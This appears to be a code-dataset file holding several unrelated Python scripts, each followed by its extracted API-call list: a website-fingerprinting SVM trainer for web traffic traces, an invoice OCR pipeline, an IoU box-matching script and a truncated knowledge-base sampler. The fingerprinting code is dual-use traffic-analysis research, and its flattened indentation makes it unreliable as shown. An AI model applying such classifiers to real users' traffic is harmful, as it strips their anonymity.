if truth == prediction:
tp += 1
else:
if truth != MON_SITE_NUM:
wp += 1
# logger.info('Wrong positive:%d %d'%(truth, prediction))
else:
fp += 1
# logger.info('False positive:%d %d'%(truth, prediction))
# logger.info('%4d %4d %4d %4d %4d'%(tp, wp, fp, p, n))
if flag:
tps += tp
wps += wp
fps += fp
ps += p
ns += n
    try:
        r_precision = tp * n / (tp * n + wp * n + r * p * fp)
    except ZeroDivisionError:
        r_precision = 0.0
    # logger.info('r-precision:%.4f', r_precision)
    # return r_precision
    return tp / p  # return the true positive rate as the score
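# A worked toy example (hypothetical counts, not derived from any real trace set) of the
# r-precision formula used above: with the module-level r = 10 and tp = 80, wp = 5,
# fp = 2, p = 100 monitored and n = 1000 unmonitored test instances,
# r-precision = tp*n / (tp*n + wp*n + r*p*fp) = 80000 / 87000, roughly 0.92.
def _rprecision_example():
    tp, wp, fp, p, n = 80, 5, 2, 100, 1000
    return tp * n / (tp * n + wp * n + r * p * fp)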
def read_conf(file):
cf = configparser.ConfigParser()
cf.read(file)
return dict(cf['default'])
def parse_arguments():
parser = argparse.ArgumentParser(description='It simulates adaptive padding on a set of web traffic traces.')
parser.add_argument('fp',
metavar='<feature path>',
help='Path to the directory of the extracted features')
parser.add_argument('type',
metavar='<model type>',
help='train a clean or dirty model',
default="None")
parser.add_argument('--log',
type=str,
dest="log",
metavar='<log path>',
default='stdout',
help='path to the log file. It will print to stdout by default.')
# Parse arguments
args = parser.parse_args()
config_logger(args)
return args
def config_logger(args):
# Set file
log_file = sys.stdout
if args.log != 'stdout':
log_file = open(args.log, 'w')
ch = logging.StreamHandler(log_file)
# Set logging format
ch.setFormatter(logging.Formatter(ct.LOG_FORMAT))
logger.addHandler(ch)
# Set level format
logger.setLevel(logging.INFO)
# SVM with RBF kernel for the open-world setting
def GridSearch(train_X,train_Y):
global OPEN_WORLD
#find the optimal gamma
param_grid = [
{
'C': [2**11,2**13,2**15,2**17],
'gamma' : [2**-3,2**-1,2**1,2**3]
}
]
if OPEN_WORLD:
my_scorer = make_scorer(score_func, greater_is_better=True)
else:
my_scorer = "accuracy"
# clf = GridSearchCV(estimator = SVC(kernel = 'rbf'), param_grid = param_grid, \
# scoring = 'accuracy', cv = 10, verbose = 2, n_jobs = -1)
clf = GridSearchCV(estimator = SVC(kernel = 'rbf'), param_grid = param_grid, \
scoring = my_scorer, cv = 5, verbose = 0, n_jobs = -1)
clf.fit(train_X, train_Y)
# logger.info('Best estimator:%s'%clf.best_estimator_)
# logger.info('Best_score_:%s'%clf.best_score_)
return clf
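# A minimal sketch (synthetic features, closed-world setting) of how GridSearch is
# called; the real pipeline below uses CUMUL features loaded from args.fp instead.
def _gridsearch_example():
    global OPEN_WORLD
    OPEN_WORLD = 0                                   # plain accuracy as the scorer
    toy_X = np.random.rand(40, 5)
    toy_y = np.random.randint(0, 2, 40)
    clf = GridSearch(toy_X, toy_y)
    return clf.best_params_['C'], clf.best_params_['gamma']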
if __name__ == '__main__':
global MON_SITE_NUM, tps, wps, fps, ps, ns, flag, OPEN_WORLD
tps, wps, fps, ps, ns = 0,0,0,0,0
flag = 0
args = parse_arguments()
# logger.info("Arguments: %s" % (args))
cf = read_conf(ct.confdir)
MON_SITE_NUM = int(cf['monitored_site_num'])
if cf['open_world'] == '1':
UNMON_SITE_NUM = int(cf['unmonitored_site_num'])
OPEN_WORLD = 1
else:
OPEN_WORLD = 0
# logger.info('loading data...')
dic = np.load(args.fp,allow_pickle=True).item()
X = np.array(dic['feature'])
y = np.array(dic['label'])
if not OPEN_WORLD:
X = X[y<MON_SITE_NUM]
y = y[y<MON_SITE_NUM]
# print(X.shape, y.shape)
#normalize the data
scaler = preprocessing.MinMaxScaler((-1,1))
X = scaler.fit_transform(X)
# logger.info('data are transformed into [-1,1]')
# find the optimal params
# logger.info('GridSearchCV...')
clf = GridSearch(X,y)
C = clf.best_params_['C']
gamma = clf.best_params_['gamma']
#C, gamma = 131072, 8.000000
# C, gamma = 8192, 8.00
# logger.info('Best params are: %d %f'%(C,gamma))
# sss = StratifiedShuffleSplit(n_splits=10, test_size=0.1, random_state=0)
# folder_num = 0
# flag = 1
# for train_index, test_index in sss.split(X,y):
# # logger.info('Testing fold %d'%folder_num)
# folder_num += 1
# # print("TRAIN:", train_index, "TEST:", test_index)
# X_train, X_test = X[train_index], X[test_index]
# y_train, y_test = y[train_index], y[test_index]
# model = SVC(C = C, gamma = gamma, kernel = 'rbf')
# model.fit(X_train, y_train)
# y_pred = model.predict(X_test)
# r_precision = score_func(y_test, y_pred)
# # logger.info('%d-presicion is %.4f'%(r, r_precision))
# print("%d %d %d %d %d"%(tps,wps,fps,ps,ns))
model = SVC(C = C, gamma = gamma, kernel = 'rbf')
model.fit(X, y)
joblib.dump(model, join(ct.modeldir,args.fp.split("/")[-1][:-4]+'.pkl'))
    print('model has been saved')
|
[
"numpy.load",
"numpy.random.seed",
"argparse.ArgumentParser",
"logging.StreamHandler",
"sklearn.preprocessing.MinMaxScaler",
"logging.Formatter",
"sklearn.metrics.make_scorer",
"random.seed",
"numpy.array",
"sklearn.svm.SVC",
"configparser.ConfigParser",
"logging.getLogger"
] |
[((675, 701), 'logging.getLogger', 'logging.getLogger', (['"""cumul"""'], {}), "('cumul')\n", (692, 701), False, 'import logging\n'), ((702, 719), 'random.seed', 'random.seed', (['(1123)'], {}), '(1123)\n', (713, 719), False, 'import random\n'), ((720, 740), 'numpy.random.seed', 'np.random.seed', (['(1123)'], {}), '(1123)\n', (734, 740), True, 'import numpy as np\n'), ((1813, 1840), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1838, 1840), False, 'import configparser\n'), ((1931, 2036), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""It simulates adaptive padding on a set of web traffic traces."""'}), "(description=\n 'It simulates adaptive padding on a set of web traffic traces.')\n", (1954, 2036), False, 'import argparse\n'), ((2893, 2924), 'logging.StreamHandler', 'logging.StreamHandler', (['log_file'], {}), '(log_file)\n', (2914, 2924), False, 'import logging\n'), ((4454, 4478), 'numpy.array', 'np.array', (["dic['feature']"], {}), "(dic['feature'])\n", (4462, 4478), True, 'import numpy as np\n'), ((4487, 4509), 'numpy.array', 'np.array', (["dic['label']"], {}), "(dic['label'])\n", (4495, 4509), True, 'import numpy as np\n'), ((4664, 4699), 'sklearn.preprocessing.MinMaxScaler', 'preprocessing.MinMaxScaler', (['(-1, 1)'], {}), '((-1, 1))\n', (4690, 4699), False, 'from sklearn import preprocessing\n'), ((5820, 5855), 'sklearn.svm.SVC', 'SVC', ([], {'C': 'C', 'gamma': 'gamma', 'kernel': '"""rbf"""'}), "(C=C, gamma=gamma, kernel='rbf')\n", (5823, 5855), False, 'from sklearn.svm import SVC\n'), ((2971, 3003), 'logging.Formatter', 'logging.Formatter', (['ct.LOG_FORMAT'], {}), '(ct.LOG_FORMAT)\n', (2988, 3003), False, 'import logging\n'), ((3365, 3412), 'sklearn.metrics.make_scorer', 'make_scorer', (['score_func'], {'greater_is_better': '(True)'}), '(score_func, greater_is_better=True)\n', (3376, 3412), False, 'from sklearn.metrics import make_scorer\n'), ((3641, 3658), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (3644, 3658), False, 'from sklearn.svm import SVC\n'), ((4401, 4436), 'numpy.load', 'np.load', (['args.fp'], {'allow_pickle': '(True)'}), '(args.fp, allow_pickle=True)\n', (4408, 4436), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from cnocr import CnOcr
# Size used later when generating the invoice image, based on the standard VAT invoice layout of 240mm x 140mm
height_resize = 1400
width_resize = 2400
# Instantiate CnOcr objects for different purposes
ocr = CnOcr(name='')  # mixed characters
ocr_numbers = CnOcr(name='numbers', cand_alphabet='0123456789.')  # digits only
ocr_UpperSerial = CnOcr(name='UpperSerial',
                       cand_alphabet='0123456789ABCDEFGHIJKLMNPQRSTUVWXYZ')  # serial numbers: uppercase letters (no O) and digits only
# Field-name keys for the purchaser and seller blocks
purchaser_dict = ['purchaserName', 'purchaserCode', 'purchaserAddrTel', 'purchaserBankCode']
seller_dict = ['sellerName', 'sellerCode', 'sellerAddrTel', 'sellerBankCode']
invoice_dict = ['invoiceCode', 'invoiceNumber', 'invoiceDate', 'checkCode']
# Regions to crop from the image - field names
crop_range_list_name = ['invoice', 'purchaser', 'seller',
'totalExpense', 'totalTax', 'totalTaxExpenseZh', 'totalTaxExpense',
'remark', 'title', 'machineCode']
# Regions to crop from the image - coordinates [x, y, width, height]
crop_range_list_data = [[1750, 20, 500, 250], [420, 280, 935, 220], [420, 1030, 935, 230],
[1500, 880, 390, 75], [2000, 880, 330, 75], [750, 960, 600, 65], [1870, 960, 300, 70],
[1455, 1045, 400, 180], [760, 50, 900, 110], [280, 200, 250, 75]]
# OCR type used for each cropped region: 0 = mixed characters, 1 = digits only, 2 = serial number, 3 = multi-line mixed
crop_range_list_type = [3, 3, 3,
                        1, 1, 0, 1,
                        0, 0, 1]
# Resize the original image
def resizeImg(image, height=height_resize):
h, w = image.shape[:2]
pro = height / h
size = (int(w * pro), int(height))
img = cv2.resize(image, size)
return img
# Edge detection
def getCanny(image):
    # Gaussian blur
    binary = cv2.GaussianBlur(image, (3, 3), 2, 2)
    # Canny edge detection
    binary = cv2.Canny(binary, 60, 240, apertureSize=3)
    # Dilate so that the edges close up as much as possible
    kernel = np.ones((3, 3), np.uint8)
    binary = cv2.dilate(binary, kernel, iterations=1)
    # Save the binary image
cv2.imwrite('result/binary.jpg', binary)
return binary
# Find the contour with the largest area
def findMaxContour(image):
    # Find contours
    contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
    # Compare areas and keep the largest
max_area = 0.0
max_contour = []
for contour in contours:
current_area = cv2.contourArea(contour)
if current_area > max_area:
max_area = current_area
max_contour = contour
return max_contour, max_area
# Fit a polygon to the convex hull and return its four vertices
def getBoxPoint(contour):
    # Convex hull of the contour
hull = cv2.convexHull(contour)
epsilon = 0.02 * cv2.arcLength(contour, True)
approx = cv2.approxPolyDP(hull, epsilon, True)
approx = approx.reshape((len(approx), 2))
return approx
# Map the quadrilateral points back to the original image scale
def adapPoint(box, pro):
box_pro = box
if pro != 1.0:
box_pro = box / pro
box_pro = np.trunc(box_pro)
return box_pro
# Order the quadrilateral vertices as [top-left, top-right, bottom-right, bottom-left]
def orderPoints(pts):
rect = np.zeros((4, 2), dtype="float32")
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
return rect
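# A tiny worked example (hypothetical corner coordinates, image-style y-down axes) of
# orderPoints: an unordered set of quadrilateral corners comes back as
# [top-left, top-right, bottom-right, bottom-left].
def _example_order_points():
    pts = np.array([[10, 90], [90, 10], [10, 10], [90, 90]], dtype='float32')
    return orderPoints(pts)   # [[10, 10], [90, 10], [90, 90], [10, 90]]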
# Distance between two points (used for width/height)
def pointDistance(a, b):
return int(np.sqrt(np.sum(np.square(a - b))))
# Perspective transform
def warpImage(image, box):
w, h = pointDistance(box[0], box[1]), \
pointDistance(box[1], box[2])
dst_rect = np.array([[0, 0],
[w - 1, 0],
[w - 1, h - 1],
[0, h - 1]], dtype='float32')
M = cv2.getPerspectiveTransform(box, dst_rect)
warped = cv2.warpPerspective(image, M, (w, h))
return warped
# Draw a quadrilateral through four points
def drawRect(img, pt1, pt2, pt3, pt4, color, line_width):
cv2.line(img, pt1, pt2, color, line_width)
cv2.line(img, pt2, pt3, color, line_width)
cv2.line(img, pt3, pt4, color, line_width)
cv2.line(img, pt1, pt4, color, line_width)
# Combined image pre-processing
def imagePreProcessing(path):
    image = cv2.imread(path)
    # Grayscale conversion and denoising (currently disabled)
    # image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
    # image = cv2.GaussianBlur(image, (3,3), 0)
    # Edge detection, contour search, vertex detection
ratio = height_resize / image.shape[0]
img = resizeImg(image)
binary_img = getCanny(img)
max_contour, max_area = findMaxContour(binary_img)
box = getBoxPoint(max_contour)
boxes = adapPoint(box, ratio)
boxes = orderPoints(boxes)
    # Perspective transform
warped = warpImage(image, boxes)
    # Resize the final image
size = (width_resize, height_resize)
warped = cv2.resize(warped, size, interpolation=cv2.INTER_CUBIC)
    # Draw the outline on the original image
drawRect(image, tuple(boxes[0]), tuple(boxes[1]), tuple(boxes[2]), tuple(boxes[3]), (0, 0, 255), 2)
cv2.imwrite("result/outline.jpg", image)
return warped
# Crop a region from the image - test-stage helper that also shows and saves the crop; in real use, call the production version below instead
def cropImage_test(img, crop_range, filename='Undefined'):
xpos, ypos, width, height = crop_range
crop = img[ypos:ypos + height, xpos:xpos + width]
    if filename == 'Undefined':  # if no filename is given, build one from the coordinates
        filename = 'crop-' + str(xpos) + '-' + str(ypos) + '-' + str(width) + '-' + str(height) + '.jpg'
    cv2.imshow(filename, crop)  # show the cropped region (testing only)
    # cv2.imwrite(filename, crop)  # imwrite garbles filenames containing Chinese characters; use imencode below instead (testing only)
    # Save the cropped region (testing only)
cv2.imencode('.jpg', crop)[1].tofile(filename)
return crop
# Crop a region from the image
def cropImage(img, crop_range):
xpos, ypos, width, height = crop_range
crop = img[ypos:ypos + height, xpos:xpos + width]
return crop
# Recognize text in a cropped region
def cropOCR(crop, ocrType):
text_crop = ''
if ocrType == 0:
text_crop_list = ocr.ocr_for_single_line(crop)
elif ocrType == 1:
text_crop_list = ocr_numbers.ocr_for_single_line(crop)
elif ocrType == 2:
text_crop_list = ocr_UpperSerial.ocr_for_single_line(crop)
elif ocrType == 3:
text_crop_list = ocr.ocr(crop)
for i in range(len(text_crop_list)):
ocr_text = ''.join(text_crop_list[i]).split(':')[-1].split(';')[-1]
            # treat any occurrence of - — _ ― as a table border and skip it
if '-' in ocr_text or '—' in ocr_text or '_' in ocr_text or '―' in ocr_text:
continue
text_crop = text_crop + ocr_text + ','
return text_crop
text_crop = ''.join(text_crop_list)
return text_crop
def imageOcr(path):
    # Pre-process the image
    # path = 'test.jpg'
    warped = imagePreProcessing(path)
    # Recognize each block
receipt = {}
for i in range(len(crop_range_list_data)):
crop = cropImage(warped, crop_range_list_data[i])
crop_text = cropOCR(crop, crop_range_list_type[i])
        # Invoices never contain lowercase o, lowercase l or uppercase O: replace o/O with 0 and l with 1, strip spaces, and keep only the text after the colon
crop_text = crop_text.replace('o', '0').replace(' ', '').replace('l', '1').replace('O', '0').split(':')[-1]
        # Seller information
if crop_range_list_name[i] == 'seller':
crop_text = crop_text.split(',')
for i in range(4):
if i < len(crop_text):
receipt.update({seller_dict[i]: crop_text[i]})
else:
receipt.update({seller_dict[i]: ''})
elif crop_range_list_name[i] == 'invoice':
crop_text = crop_text.split(',')
for i in range(4):
if i < len(crop_text):
receipt.update({invoice_dict[i]: crop_text[i]})
else:
receipt.update({invoice_dict[i]: ''})
elif crop_range_list_name[i] == 'purchaser':
crop_text = crop_text.split(',')
for i in range(4):
if i < len(crop_text):
receipt.update({purchaser_dict[i]: crop_text[i]})
else:
receipt.update({purchaser_dict[i]: ''})
else:
if crop_range_list_name[i] == 'title':
                crop_text = crop_text[0:2] + '增值税普通发票'  # keep the first two characters and append "VAT ordinary invoice"
receipt.update({crop_range_list_name[i]: crop_text})
receipt['sellerCode'] = receipt['sellerCode'].replace('工', '1').replace('.', '')
receipt['purchaserCode'] = receipt['purchaserCode'].replace('工', '1').replace('.', '')
for key in receipt:
print(key + ':' + receipt[key])
receipt.update({"serviceDetails": []})
cv2.imwrite('result/block.jpg', warped)
    # Show the recognized regions
for i in range(len(crop_range_list_data)):
warped = cv2.rectangle(warped, (crop_range_list_data[i][0], crop_range_list_data[i][1]),
(crop_range_list_data[i][0] + crop_range_list_data[i][2],
crop_range_list_data[i][1] + crop_range_list_data[i][3]),
(0, 0, 255), 2)
    # Show and save the pre-processed image (testing only; fails in a headless production environment)
# cv2.namedWindow("warpImage", 0)
# cv2.resizeWindow("warpImage", 1200, 700)
# cv2.imshow('warpImage', warped)
    # Save the image locally
cv2.imwrite('result/result.jpg', warped)
return receipt
if __name__ == '__main__':
print(imageOcr("test0.jpg"))
# cv2.waitKey(0)
|
[
"cv2.GaussianBlur",
"cv2.approxPolyDP",
"cv2.getPerspectiveTransform",
"cv2.arcLength",
"numpy.argmax",
"numpy.ones",
"numpy.argmin",
"cv2.rectangle",
"cv2.imencode",
"cv2.imshow",
"cv2.line",
"cv2.warpPerspective",
"cv2.contourArea",
"cv2.dilate",
"cv2.imwrite",
"cv2.resize",
"cnocr.CnOcr",
"cv2.Canny",
"numpy.square",
"cv2.convexHull",
"numpy.zeros",
"cv2.imread",
"numpy.diff",
"numpy.array",
"numpy.trunc",
"cv2.findContours"
] |
[((208, 222), 'cnocr.CnOcr', 'CnOcr', ([], {'name': '""""""'}), "(name='')\n", (213, 222), False, 'from cnocr import CnOcr\n'), ((245, 295), 'cnocr.CnOcr', 'CnOcr', ([], {'name': '"""numbers"""', 'cand_alphabet': '"""0123456789."""'}), "(name='numbers', cand_alphabet='0123456789.')\n", (250, 295), False, 'from cnocr import CnOcr\n'), ((321, 399), 'cnocr.CnOcr', 'CnOcr', ([], {'name': '"""UpperSerial"""', 'cand_alphabet': '"""0123456789ABCDEFGHIJKLMNPQRSTUVWXYZ"""'}), "(name='UpperSerial', cand_alphabet='0123456789ABCDEFGHIJKLMNPQRSTUVWXYZ')\n", (326, 399), False, 'from cnocr import CnOcr\n'), ((1536, 1559), 'cv2.resize', 'cv2.resize', (['image', 'size'], {}), '(image, size)\n', (1546, 1559), False, 'import cv2\n'), ((1629, 1666), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['image', '(3, 3)', '(2)', '(2)'], {}), '(image, (3, 3), 2, 2)\n', (1645, 1666), False, 'import cv2\n'), ((1691, 1733), 'cv2.Canny', 'cv2.Canny', (['binary', '(60)', '(240)'], {'apertureSize': '(3)'}), '(binary, 60, 240, apertureSize=3)\n', (1700, 1733), False, 'import cv2\n'), ((1766, 1791), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.uint8'], {}), '((3, 3), np.uint8)\n', (1773, 1791), True, 'import numpy as np\n'), ((1805, 1845), 'cv2.dilate', 'cv2.dilate', (['binary', 'kernel'], {'iterations': '(1)'}), '(binary, kernel, iterations=1)\n', (1815, 1845), False, 'import cv2\n'), ((1861, 1901), 'cv2.imwrite', 'cv2.imwrite', (['"""result/binary.jpg"""', 'binary'], {}), "('result/binary.jpg', binary)\n", (1872, 1901), False, 'import cv2\n'), ((1990, 2055), 'cv2.findContours', 'cv2.findContours', (['image', 'cv2.RETR_EXTERNAL', 'cv2.CHAIN_APPROX_NONE'], {}), '(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n', (2006, 2055), False, 'import cv2\n'), ((2391, 2414), 'cv2.convexHull', 'cv2.convexHull', (['contour'], {}), '(contour)\n', (2405, 2414), False, 'import cv2\n'), ((2478, 2515), 'cv2.approxPolyDP', 'cv2.approxPolyDP', (['hull', 'epsilon', '(True)'], {}), '(hull, epsilon, True)\n', (2494, 2515), False, 'import cv2\n'), ((2697, 2714), 'numpy.trunc', 'np.trunc', (['box_pro'], {}), '(box_pro)\n', (2705, 2714), True, 'import numpy as np\n'), ((2828, 2861), 'numpy.zeros', 'np.zeros', (['(4, 2)'], {'dtype': '"""float32"""'}), "((4, 2), dtype='float32')\n", (2836, 2861), True, 'import numpy as np\n'), ((2961, 2981), 'numpy.diff', 'np.diff', (['pts'], {'axis': '(1)'}), '(pts, axis=1)\n', (2968, 2981), True, 'import numpy as np\n'), ((3288, 3363), 'numpy.array', 'np.array', (['[[0, 0], [w - 1, 0], [w - 1, h - 1], [0, h - 1]]'], {'dtype': '"""float32"""'}), "([[0, 0], [w - 1, 0], [w - 1, h - 1], [0, h - 1]], dtype='float32')\n", (3296, 3363), True, 'import numpy as np\n'), ((3447, 3489), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['box', 'dst_rect'], {}), '(box, dst_rect)\n', (3474, 3489), False, 'import cv2\n'), ((3503, 3540), 'cv2.warpPerspective', 'cv2.warpPerspective', (['image', 'M', '(w, h)'], {}), '(image, M, (w, h))\n', (3522, 3540), False, 'import cv2\n'), ((3634, 3676), 'cv2.line', 'cv2.line', (['img', 'pt1', 'pt2', 'color', 'line_width'], {}), '(img, pt1, pt2, color, line_width)\n', (3642, 3676), False, 'import cv2\n'), ((3681, 3723), 'cv2.line', 'cv2.line', (['img', 'pt2', 'pt3', 'color', 'line_width'], {}), '(img, pt2, pt3, color, line_width)\n', (3689, 3723), False, 'import cv2\n'), ((3728, 3770), 'cv2.line', 'cv2.line', (['img', 'pt3', 'pt4', 'color', 'line_width'], {}), '(img, pt3, pt4, color, line_width)\n', (3736, 3770), False, 'import cv2\n'), ((3775, 3817), 'cv2.line', 'cv2.line', (['img', 'pt1', 
'pt4', 'color', 'line_width'], {}), '(img, pt1, pt4, color, line_width)\n', (3783, 3817), False, 'import cv2\n'), ((3872, 3888), 'cv2.imread', 'cv2.imread', (['path'], {}), '(path)\n', (3882, 3888), False, 'import cv2\n'), ((4399, 4454), 'cv2.resize', 'cv2.resize', (['warped', 'size'], {'interpolation': 'cv2.INTER_CUBIC'}), '(warped, size, interpolation=cv2.INTER_CUBIC)\n', (4409, 4454), False, 'import cv2\n'), ((4575, 4615), 'cv2.imwrite', 'cv2.imwrite', (['"""result/outline.jpg"""', 'image'], {}), "('result/outline.jpg', image)\n", (4586, 4615), False, 'import cv2\n'), ((5012, 5038), 'cv2.imshow', 'cv2.imshow', (['filename', 'crop'], {}), '(filename, crop)\n', (5022, 5038), False, 'import cv2\n'), ((8092, 8131), 'cv2.imwrite', 'cv2.imwrite', (['"""result/block.jpg"""', 'warped'], {}), "('result/block.jpg', warped)\n", (8103, 8131), False, 'import cv2\n'), ((8691, 8731), 'cv2.imwrite', 'cv2.imwrite', (['"""result/result.jpg"""', 'warped'], {}), "('result/result.jpg', warped)\n", (8702, 8731), False, 'import cv2\n'), ((2159, 2183), 'cv2.contourArea', 'cv2.contourArea', (['contour'], {}), '(contour)\n', (2174, 2183), False, 'import cv2\n'), ((2436, 2464), 'cv2.arcLength', 'cv2.arcLength', (['contour', '(True)'], {}), '(contour, True)\n', (2449, 2464), False, 'import cv2\n'), ((2904, 2916), 'numpy.argmin', 'np.argmin', (['s'], {}), '(s)\n', (2913, 2916), True, 'import numpy as np\n'), ((2936, 2948), 'numpy.argmax', 'np.argmax', (['s'], {}), '(s)\n', (2945, 2948), True, 'import numpy as np\n'), ((3000, 3015), 'numpy.argmin', 'np.argmin', (['diff'], {}), '(diff)\n', (3009, 3015), True, 'import numpy as np\n'), ((3035, 3050), 'numpy.argmax', 'np.argmax', (['diff'], {}), '(diff)\n', (3044, 3050), True, 'import numpy as np\n'), ((8210, 8431), 'cv2.rectangle', 'cv2.rectangle', (['warped', '(crop_range_list_data[i][0], crop_range_list_data[i][1])', '(crop_range_list_data[i][0] + crop_range_list_data[i][2], \n crop_range_list_data[i][1] + crop_range_list_data[i][3])', '(0, 0, 255)', '(2)'], {}), '(warped, (crop_range_list_data[i][0], crop_range_list_data[i][\n 1]), (crop_range_list_data[i][0] + crop_range_list_data[i][2], \n crop_range_list_data[i][1] + crop_range_list_data[i][3]), (0, 0, 255), 2)\n', (8223, 8431), False, 'import cv2\n'), ((3132, 3148), 'numpy.square', 'np.square', (['(a - b)'], {}), '(a - b)\n', (3141, 3148), True, 'import numpy as np\n'), ((5159, 5185), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'crop'], {}), "('.jpg', crop)\n", (5171, 5185), False, 'import cv2\n')]
|
import numpy as np
# create array data
predict = np.array([[1,2,2,1],
[4.5,2.5,10,0.5],
[6,6,8,4],
[6.26,6.26,8.26,4.26]],np.double)
truth = np.array([[1,4,3,3],
[1.2,2.2,2.2,1.2],
[5,2,8,1],
[6.1,6.1,8.1,4.1],
[8.1,8.1,11.1,9.1]], np.double)
# get useful variables
nums_pred = len(predict)
nums_gt = len(truth)
iou_matrix = np.zeros((nums_pred,nums_gt))
# boxA stores the top-left and bottom-right corners of the bounding box
# boxA = [x1, y1, x2, y2]
def iou(boxA, boxB):
    # Compute the four edges of the overlap region; note the use of max/min
    left_max = max(boxA[0], boxB[0])
    top_max = max(boxA[1], boxB[1])
    right_min = min(boxA[2], boxB[2])
    bottom_min = min(boxA[3], boxB[3])
    # Area of the overlap region
    inter = max(0, (right_min - left_max)) * max(0, (bottom_min - top_max))  # width * height
Sa = (boxA[2]-boxA[0])*(boxA[3]-boxA[1])
Sb = (boxB[2]-boxB[0])*(boxB[3]-boxB[1])
    # Total area covered by both boxes, then the IoU
union = Sa+Sb-inter
iou = inter/union
return iou
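# A worked toy example (hypothetical boxes in [x1, y1, x2, y2] form): two 2x2 boxes
# offset by one unit overlap in a 1x1 square, so IoU = 1 / (4 + 4 - 1) = 1/7.
def _iou_example():
    boxA = [0, 0, 2, 2]
    boxB = [1, 1, 3, 3]
    return iou(boxA, boxB)   # ~0.142857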
def transformBBox(boxA):
    # Convert a BBox from bottom-left + top-right to top-left + bottom-right representation
return [boxA[0], boxA[3], boxA[2], boxA[1]]
# get iou matrix
for i in range(nums_pred):
for j in range(nums_gt):
#print(truth[j])
iou_matrix[i][j] = iou(transformBBox(predict[i]), transformBBox(truth[j]))
print(iou_matrix)
res = []
IOU_theta = 0.4
while np.any(iou_matrix > IOU_theta):
ind = np.argmax(iou_matrix)
ind_col = ind % nums_gt
ind_row = (ind - ind_col) // nums_gt
print("row = %d, col = %d"%(ind_row, ind_col))
# store results for more analysis
res.append([predict[ind_row], truth[ind_col]])
# set the correspoding row and col to zero
    # exclude those already paired from future comparison
iou_matrix[ind_row][:] = 0
# set col to 0
for ii in range(nums_pred):
iou_matrix[ii][ind_col] = 0
print(iou_matrix)
print(res)
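# Side note (a sketch, not part of the original loop above): np.unravel_index recovers
# the same (row, col) pair as the manual modulo/division on the flat argmax.
def _argmax_rowcol(matrix):
    return np.unravel_index(np.argmax(matrix), matrix.shape)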
|
[
"numpy.zeros",
"numpy.any",
"numpy.array",
"numpy.argmax"
] |
[((51, 152), 'numpy.array', 'np.array', (['[[1, 2, 2, 1], [4.5, 2.5, 10, 0.5], [6, 6, 8, 4], [6.26, 6.26, 8.26, 4.26]]', 'np.double'], {}), '([[1, 2, 2, 1], [4.5, 2.5, 10, 0.5], [6, 6, 8, 4], [6.26, 6.26, \n 8.26, 4.26]], np.double)\n', (59, 152), True, 'import numpy as np\n'), ((202, 322), 'numpy.array', 'np.array', (['[[1, 4, 3, 3], [1.2, 2.2, 2.2, 1.2], [5, 2, 8, 1], [6.1, 6.1, 8.1, 4.1], [\n 8.1, 8.1, 11.1, 9.1]]', 'np.double'], {}), '([[1, 4, 3, 3], [1.2, 2.2, 2.2, 1.2], [5, 2, 8, 1], [6.1, 6.1, 8.1,\n 4.1], [8.1, 8.1, 11.1, 9.1]], np.double)\n', (210, 322), True, 'import numpy as np\n'), ((452, 482), 'numpy.zeros', 'np.zeros', (['(nums_pred, nums_gt)'], {}), '((nums_pred, nums_gt))\n', (460, 482), True, 'import numpy as np\n'), ((1332, 1362), 'numpy.any', 'np.any', (['(iou_matrix > IOU_theta)'], {}), '(iou_matrix > IOU_theta)\n', (1338, 1362), True, 'import numpy as np\n'), ((1371, 1392), 'numpy.argmax', 'np.argmax', (['iou_matrix'], {}), '(iou_matrix)\n', (1380, 1392), True, 'import numpy as np\n')]
|
from kb import KB, TRAIN_LABEL, DEV_LABEL, TEST_LABEL
import random
import numpy as np
class SampleKB:
def __init__(self, num_relations, num_entities,
arities=[0.0, 1.0, 0.0],
fb_densities=[0.0, 0.0, 0.0],
arg_densities=[0., 0.1, 0.0],
fact_prob=0.2,
num_symm=2,
num_impl=[0, 2, 0],
num_impl_inv=2,
num_impl_conj=[0, 2, 0],
num_trans_single=2,
num_trans_diff=2,
seed=0,
position_dependent_args=False,
position_densities=[0., 0.5, 0.0]):
"""
:param num_relations:
:param num_entities: number of distinct entities to generate
:param arities: fraction of arities
:param arg_densities: fraction of entity combinations that are observed
:param fact_prob:
:param num_inv: number of 'inv' formulae R(X0, X1) :- R(X1, X0)
:param num_impl:
:param num_impl_conj:
:param num_trans:
:param negated_head_prob:
:param seed:
:return:
"""
random.seed(seed)
self.kb = KB(seed=seed)
num_relations_per_arity = [int(x * num_relations) for x in arities]
entities = list(map(lambda x: "e" + str(x), range(1, num_entities+1)))
entities_arg1 = []
entities_arg2 = []
entities_arg3 = []
if position_dependent_args:
arg1_boundary = int(len(entities)*position_densities[0])
arg2_boundary = arg1_boundary + int(len(entities)*position_densities[1])
entities_arg1 = entities[0:arg1_boundary]
entities_arg2 = entities[arg1_boundary:arg2_boundary]
entities_arg3 = entities[arg2_boundary:]
else:
entities_arg1 = entities
entities_arg2 = entities
entities_arg3 = entities
pairs = [(x, y) for x in entities_arg1
for y in entities_arg2 if not x == y]
triples = [(x, y, z) for x in entities_arg1
for y in entities_arg2 for z in entities_arg3
if not x == y and not y == z and not z == x]
num_pair_samples = min(len(pairs), int(len(entities_arg1) *
len(entities_arg2) *
arg_densities[1]))
num_triple_samples = min(len(triples), int(len(entities_arg1) *
len(entities_arg2) *
len(entities_arg3) *
arg_densities[2]))
entities_per_arity = {
1: entities_arg1,
2: random.sample(pairs, num_pair_samples),
3: random.sample(triples, num_triple_samples)
}
relations_per_arity = {}
for arity in range(1, len(num_relations_per_arity) + 1):
for i in range(1, num_relations_per_arity[arity - 1] + 1):
fb_prefix = ""
